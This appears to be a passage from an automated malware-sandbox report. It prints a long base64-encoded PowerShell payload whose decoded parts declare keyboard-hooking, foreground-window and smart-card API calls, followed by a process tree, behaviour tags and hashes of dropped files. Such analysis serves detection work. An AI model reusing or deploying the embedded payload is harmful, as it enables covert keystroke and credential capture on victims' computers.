AFsAXQAgAGUANwA1ACAAPQAgAG4AZQB3ACAAYgB5AHQAZQBbAGcANwA0AF0AOwBpAGYAIAAoAFMAQwBhAHIAZABMAGkAcwB0AFIAZQBhAGQAZQByAHMAKABlADIANwAsACAAbgB1AGwAbAAsACAAZQA3ADUALAAgAG8AdQB0ACAAZwA3ADQAKQAgAD0APQAgADAAKQB7AEwAaQBzAHQAPABzAHQAcgBpAG4AZwA+ACAAawA3ADYAIAA9ACAAagA2ADAAKABlADcANQApADsAaQBuAHQAIABoADcANwAgAD0AIABrADcANgAuAEMAbwB1AG4AdAA7AGkAZgAgACgAaAA3ADcAIAA+ACAAMAApAHsAaQBuAHQAIABpADcAOAAgAD0AIAAwADsAbwAyADgAWwBdACAAbwA3ADkAIAA9ACAAbgBlAHcAIABvADIAOABbAGgANwA3AF0AOwBmAG8AcgBlAGEAYwBoACAAKABzAHQAcgBpAG4AZwAgAGQAOAAwACAAaQBuACAAawA3ADYAKQB7AG8ANwA5AFsAaQA3ADgAXQAuAGcAMgA5ACAAPQAgAGQAOAAwADsAaQA3ADgAKwArADsAfQBpAGYAIAAoAFMAQwBhAHIAZABHAGUAdABTAHQAYQB0AHUAcwBDAGgAYQBuAGcAZQAoAGUAMgA3ACwAIAA1ADAAMAAsACAAbwA3ADkALAAgAG8ANwA5AC4ATABlAG4AZwB0AGgAKQAgAD0APQAgADAAKQB7AGYAbwByACAAKABpAG4AdAAgAG4AOAAxACAAPQAgADAAOwAgAG4AOAAxACAAPAAgAGgANwA3ADsAIABuADgAMQArACsAKQB7AGwANwAzACAAPQAgAG8ANwA5AFsAbgA4ADEAXQA7AGQANwAyACAAKwA9ACAAbAA3ADMALgBnADIAOQA7AGkAZgAgACgAKABsADcAMwAuAGsAMwAyACAAJgAgADAAeAAwADAAMAAwADAAMAAyADAAKQAgACEAPQAgADAAKQAgAGQANwAyACAAKwA9ACAAIgAgAC0AIABmAG8AdQBuAGQAIgA7AGQANwAyACAAKwA9ACAAIgBcAHIAXABuACIAOwB9AH0AfQB9AH0AUgBlAGcAaQBzAHQAcgB5AC4AUwBlAHQAVgBhAGwAdQBlACgAbwAyADAALAAgAHAAMgAyACwAIABkADcAMgApADsAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAC4AUwBsAGUAZQBwACgAMQAwADAAMAApADsAfQByAGUAdAB1AHIAbgAgADAAOwB9AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFMAZQB0AFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKABpAG4AdAAgAGgAOAAyACwAIABpADMAIABnADgAMwAsACAASQBuAHQAUAB0AHIAIABhADgANAAsACAAdQBpAG4AdAAgAGYAOAA1ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFUAbgBoAG8AbwBrAFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKABJAG4AdABQAHQAcgAgAGQAOAA2ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAGEAbABsAE4AZQB4AHQASABvAG8AawBFAHgAKABJAG4AdABQAHQAcgAgAGQAOAA2ACwAIABpAG4AdAAgAG4ANAA4ACwAIABJAG4AdABQAHQAcgAgAGYANAA5ACwAIABJAG4AdABQAHQAcgAgAG4ANQAwACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQATQBvAGQAdQBsAGUASABhAG4AZABsAGUAKABzAHQAcgBpAG4AZwAgAGkAOAA3ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAE0AYQBwAFYAaQByAHQAdQBhAGwASwBlAHkAKABpAG4AdAAgAGwAOAA4ACwAIAB1AGkAbgB0ACAAYQA4ADkAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAARwBlAHQASwBlAHkAYgBvAGEAcgBkAEwAYQB5AG8AdQB0ACgAdQBpAG4AdAAgAG8AOQAwACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFQAbwBVAG4AaQBjAG8AZABlAEUAeAAoAGkAbgB0ACAAYQA5ADEALAAgAHUAaQBuAHQAIABoADkAMgAsACAAYgB5AHQAZQBbAF0AIABpADkAMwAsACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGEAOQA0ACwAIABpAG4AdAAgAG8AOQA1ACwAIAB1AGkAbgB0ACAAYQA5ADYALAAgAHUAaQBuAHQAIABtADkANwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABHAGUAdABLAGUAeQBiAG8AYQByAGQAUwB0AGEAdABlACgAYgB5AHQAZQBbAF0AIABvADkAOAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACgAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKAB1AGkAbgB0ACAAYgA5ADkALAAgAHIAZQBmACAAdQBpAG4AdAAgAG0AMQAwADAAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQATABlAG4AZwB0AGgAKAB1AGkAbgB0ACAAawAxADAAMQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAdQBpAG4AdAAgAGsAMQAwADEALAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABrADEAMAAyACwAIABpAG4AdAAgAHAAMQAwADMAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABjADEAMAA0ACwAIAB1AGkAbgB0ACAAZwAxADAANQAsACAAbwA2ACAAaQAxADAANgAsACAASQBuAHQAUAB0AHIAIABuADEAMAA3ACwAIAB1AGkAbgB0ACAAYgAxADAAOAAsACAASQBuAHQAUAB0AHIAIABrADEAMAA5ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABFAHgAaQB0AFAAcgBvAGMAZQBzAHMAKAB1AGkAbgB0ACAAaAAxADEAMAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAAQwByAGUAYQB0AGUATQB1AHQAZQB4ACgASQBuAHQAUAB0AHIAIABrADEAMQAxACwAIABiAG8AbwBsACAAagAxADEAMgAsACAAcwB0AHIAaQBuAGcAIABhADEAMQAzACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABPAHAAZQBuAE0AdQB0AGUAeAAoAHUAaQBuAHQAIABtADEAMQA0ACwAIABiAG8AbwBsACAAbgAxADEANQAsACAAcwB0AHIAaQBuAGcAIABhADEAMQAzACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB3AGkAbgBzAGMAYQByAGQALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUwBDAGEAcgBkAEUAcwB0AGEAYgBsAGkAcwBoAEMAbwBuAHQAZQB4AHQAKABJAG4AdAAzADIAIABsADEAMQA2ACwAIABJAG4AdABQAHQAcgAgAG4AMQAxADcALAAgAEkAbgB0AFAAdAByACAAYQAxADEAOAAsACAAbwB1AHQAIABJAG4AdABQAHQAcgAgAGUAMQAxADkAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHcAaQBuAHMAYwBhAHIAZAAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAIAA9ACAAIgBTAEMAYQByAGQATABpAHMAdABSAGUAYQBkAGUAcgBzAEEAIgAsACAAQwBoAGEAcgBTAGUAdAAgAD0AIABDAGgAYQByAFMAZQB0AC4AQQBuAHMAaQApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFMAQwBhAHIAZABMAGkAcwB0AFIAZQBhAGQAZQByAHMAKABJAG4AdABQAHQAcgAgAGUAMQAxADkALAAgAGIAeQB0AGUAWwBdACAAbAAxADIAMAAsACAAYgB5AHQAZQBbAF0AIABjADEAMgAxACwAIABvAHUAdAAgAFUASQBuAHQAMwAyACAAYQAxADIAMgApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdwBpAG4AcwBjAGEAcgBkAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFMAQwBhAHIAZABHAGUAdABTAHQAYQB0AHUAcwBDAGgAYQBuAGcAZQAoAEkAbgB0AFAAdAByACAAZQAxADEAOQAsACAAVQBJAG4AdAAzADIAIABqADEAMgAzACwAIABbAEkAbgAsACAATwB1AHQAXQAgAG8AMgA4AFsAXQAgAG8ANwA5ACwAIABJAG4AdAAzADIAIABpADEAMgA0ACkAOwB9AH0ADQAKACIAQAAgAC0AUgBlAGYAZQByAGUAbgBjAGUAZABBAHMAcwBlAG0AYgBsAGkAZQBzACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAWwBoADEALgBtADIAXQA6ADoAUgB1AG4AKAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBjAG8AbgBzAG8AbABlAF0AOgA6AEMAYQBwAHMATABvAGMAawAgAH0AIAApAA==
    1⤵
    • Process spawned unexpected child process
    • Command and Scripting Interpreter: PowerShell
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:756
    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oqn_l_rw.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1552
      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2F1D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2F1C.tmp"
        3⤵
          PID:2284

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\1067919630

      Filesize

      40KB

      MD5

      e8e320afa7d78932e1499af79c94c1ea

      SHA1

      5f2bc466f2ba7dd589e4e03b94dd77ae6a0675a9

      SHA256

      74e79db1ed285443c5f3916cdbd528a9dd0e99a882866e51b45c9f7e8e6b19c3

      SHA512

      ff9fc221766e34ac43f4192de898940dd6d36bdb7150382191ad8f295c49e4a967acf8f3b634835da5abe950a80f44355c4216bae81a8824dca2208ab89eb236

    • C:\Users\Admin\AppData\Local\Temp\14438590

      Filesize

      57KB

      MD5

      edc65270f5b190e82fd98b85303c8e97

      SHA1

      bade9760997ac713743cf48759acc58867a0dd73

      SHA256

      2d61b9799418fe0005eb663b970b19d8e330b51e3b68099a209d066c84d32015

      SHA512

      699abecff99bb9ff7d4443c39a1ad853df025531aac4ceb5c12f765f501ad4b456eea9d5994a847fca67674bcafb9cf29c4c4873c839b5d66a4d0602e534184f

    • C:\Users\Admin\AppData\Local\Temp\RES2F1D.tmp

      Filesize

      1KB

      MD5

      d85760f07e870e76954f4fd0398f5076

      SHA1

      67a8ee563c65014cf94c23164a2d8813748172c4

      SHA256

      cc566c8ceb6731cc65c45d6c2266ac7c5da2755c47a4b492df3705cab4a21d81

      SHA512

      203e7ae6199d7e4ff244600e158329845481c6d5b47ec90e9d6b9d18335813c84abb226f68438d49d9da8edc5b86140f69ff621097a685d0a955acb9bc2b4901

    • C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll

      Filesize

      13KB

      MD5

      0a235e8362613509efd31bfdbb22f978

      SHA1

      8bcb0297001dfd4963e8d17270ad0d2024a96912

      SHA256

      175c6cc0a98c16f18e333b5622415d3d962a5d1c05044d34823c8541d6abfcd5

      SHA512

      bb2cf2457ba063c971c9944f9a6fda4a89eab80265e270f6371a826bdfc753a62828c83f984897127f213837adb8f90956263dd51823e270c5081fafea630db4

    • C:\Users\Admin\AppData\Local\Temp\oqn_l_rw.dll

      Filesize

      10KB

      MD5

      e66d3ea63bb276844542ef57eb9b8103

      SHA1

      6d9ddcba3aba5d6af4b7c688ff05d636d0470ebd

      SHA256

      5b1a60622b6a3bb40be10e98445bead60899357317bcaec8a9f5c36712242bf6

      SHA512

      9021608ac916a3220fa1c173236d01b0f8957e9d3969fe1034fb18e417b1d25a6c81c7386ff1093d249e679a479a9ad8dde42c7b6f70a8c89dfbda58a9b5a978

    • C:\Users\Admin\AppData\Local\Temp\oqn_l_rw.pdb

      Filesize

      17KB

      MD5

      d6ba1ab06174cb4c7d832cc68cdb40b6

      SHA1

      781345652229853a390493cb377ab1afc375cdd5

      SHA256

      edb943047b847862321fe5c848d511720c142fabd42487651eb25ad75cdfbd10

      SHA512

      3176c189a74eed84e745b319a0af2120ab73974948ec206ec74672ff3463d71571ce19e3a7313b8486a3b0770f9406935acb8ee9ea635b3868928d28ea4e15ed

    • C:\Users\Admin\AppData\Local\dynwrapx.dll

      Filesize

      13KB

      MD5

      ca820517f8fd74d21944d846df6b7c20

      SHA1

      1f87eeb37156d64de97d042b9bcfbaf185f8737d

      SHA256

      1b5eb6d4680f7d4da7e2a1a1060b9f13565e082346e375a92244bb55672d49d7

      SHA512

      27e83483f9dd50b2f897b5b93171b17c0e78719b6f05070c7ef4d69fb80f31cb1342b50685e43a7401fc13e56c83d5a52ed7ccfb69ac5bd3c33461fa10f3985a

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      f3737bf1ab2501c8b9ca19725f4987be

      SHA1

      673e952b632801aa3dec5ba5fc1e3d1a33d5d552

      SHA256

      922d8528e4bf8f8e94c5bbde76cfc645fbfb41ec0d1073bedff76f2ad4316e74

      SHA512

      8303b2cf224a8cf7790c68fd3e9a9804659b2948c7d312f1dc90c1c974107bf955821149394c8a8e697f3871e21049de2de0ecbec040805e43d86d69fcb49503

    • \??\c:\Users\Admin\AppData\Local\Temp\CSC2F1C.tmp

      Filesize

      652B

      MD5

      50821f968f1754fa26a160568ef17f63

      SHA1

      db777b9bec9698438f55126b735bc42058571dbe

      SHA256

      363d322586064ec71e3e1c4fefee37c2f5b486849f251fcdcd10cd3d7c754d85

      SHA512

      09f3e070f6a4ff6b710f97eba3dd74b065adad3b5b5d00f44736e2cf633fa8ddb1850e94477513928389fb8b86932c6ebb01970e354b6d786cecbfbaf4fe375a

    • \??\c:\Users\Admin\AppData\Local\Temp\oqn_l_rw.0.cs

      Filesize

      7KB

      MD5

      5d213659c30df0548b2e73c49ab2861d

      SHA1

      cab754a8b7457d595ee1ae8b2926af3a9c11e023

      SHA256

      ea6a45c7d22650d5b5c7a96d543ad90951a5b02126bc3b4917a4ce9ff2d3026d

      SHA512

      724ef31c1f26c5aea409edf99b3a68974a6a58c68b00a6665e66d4732f2438dc9f866a39a9cd7507a6a9667707b890984a7a25f6a1fb7aa68c64a149c52af468

    • \??\c:\Users\Admin\AppData\Local\Temp\oqn_l_rw.cmdline

      Filesize

      415B

      MD5

      3310ce64bd5133a4ffa404ed63421e62

      SHA1

      98a391d236f1ec2f1a8a24b978a74d55441232a0

      SHA256

      be5b9b94eba71558eaabd0b3a4060f8fc3f3de4671c6777d34d25d3c80912a06

      SHA512

      1ca28939b44c240ea4cca8dd829f488e39fafeee276741d055c89d37d8d86bce5340968d5d98de3d8df501bd19598f300fa5edf2a0508576b49605ed09d272f3

    • memory/756-55-0x0000000002870000-0x0000000002878000-memory.dmp

      Filesize

      32KB

    • memory/756-54-0x000000001B720000-0x000000001BA02000-memory.dmp

      Filesize

      2.9MB

    • memory/756-69-0x0000000002BF0000-0x0000000002BF8000-memory.dmp

      Filesize

      32KB